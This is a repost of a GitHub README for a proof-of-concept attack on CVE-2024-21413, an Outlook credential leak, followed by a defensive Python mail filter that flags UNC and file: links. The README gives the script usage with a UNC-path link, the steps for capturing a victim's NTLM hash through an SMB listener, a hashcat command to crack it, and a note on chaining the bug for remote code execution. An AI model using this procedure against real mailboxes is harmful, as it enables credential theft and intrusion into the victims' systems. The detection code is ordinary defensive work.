CVE-2024-21413 Microsoft Outlook Remote Code Execution Vulnerability

Microsoft Outlook credential leak and, when chained with CVE-2023-21716, remote code execution vulnerability. Outlook should warn you about the risk when opening an external link, but this is not the case!

🚀 usage:

./cve-2024-21413.sh mx.fqdn port sender recipient url

example:

./cve-2024-21413.sh mail.mydomain.com 25 [email protected] [email protected] "\\xx.xx.xx.xx\test\duy31.txt"

notes:

chmod +x cve-2024-21413.sh

Requires the expect application, plus a legitimate sender IP and sender email address (to pass SPF, DKIM, DMARC).

  • First, run an SMB listener

  • Run the PoC

  • Wait for the email, then click on the link in the preview window

  • You should then retrieve the login and hash of the person who clicked on the link (without the warning prompt on affected Outlook versions)

  • You can then try to crack the password with hashcat: copy the whole line containing the login name to a file and run hashcat with hash mode 5600

hashcat -a 0 -m 5600 hash.txt rockyou.txt -o cracked.txt -O

You can chain this CVE with CVE-2023-21716 to obtain RCE!
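
On the receiving side, a mail filter can flag messages whose HTML links point at a file share, which is the kind of link passed as the `url` argument above. The following is an added example, not part of the original README; the function names, the matching rule and the sample message are assumptions constructed for illustration.

```python
import re
from email import message_from_string, policy
from html.parser import HTMLParser
from urllib.parse import unquote

# Constructed rule: a link target is suspicious when it is a UNC path
# (\\host\share...) or uses the file: scheme, since neither belongs in mail.
REMOTE_FILE = re.compile(r'^\s*(?:file:|\\\\[^\\/]+[\\/])', re.IGNORECASE)

class LinkCollector(HTMLParser):
    """Collect href/src attribute values from an HTML body."""
    def __init__(self):
        super().__init__()
        self.targets = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in ("href", "src") and value:
                self.targets.append(value)

def suspicious_links(raw_message: str) -> list[str]:
    """Return link targets in the HTML parts that point at a file share."""
    msg = message_from_string(raw_message, policy=policy.default)
    flagged = []
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        collector = LinkCollector()
        collector.feed(part.get_content())
        # Match on the percent-decoded form so %5C%5Chost%5C... is caught too.
        flagged += [t for t in collector.targets if REMOTE_FILE.match(unquote(t))]
    return flagged

# Constructed sample message (192.0.2.10 is a documentation address).
SAMPLE = (
    "From: sender@example.com\n"
    "To: recipient@example.com\n"
    "Subject: quarterly report\n"
    "MIME-Version: 1.0\n"
    "Content-Type: text/html; charset=utf-8\n"
    "\n"
    '<p><a href="https://example.com/ok">portal</a>\n'
    r'<a href="\\192.0.2.10\share\doc.txt">report</a>' "\n"
    '<a href="file://192.0.2.10/share/doc.txt">copy</a></p>\n'
)

if __name__ == "__main__":
    for target in suspicious_links(SAMPLE):
        print("suspicious link target:", target)
```

A hit is a reason to quarantine or rewrite the link, and blocking outbound SMB at the network edge keeps a click from ever reaching an external listener.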

Originally published on Github: CVE-2024-21413 Microsoft Outlook Remote Code Execution Vulnerability

Copyright notice: posted by admin on February 26, 2024 at 11:43 PM.
When reposting, please credit: CVE-2024-21413 Microsoft Outlook Remote Code Execution Vulnerability | CTF导航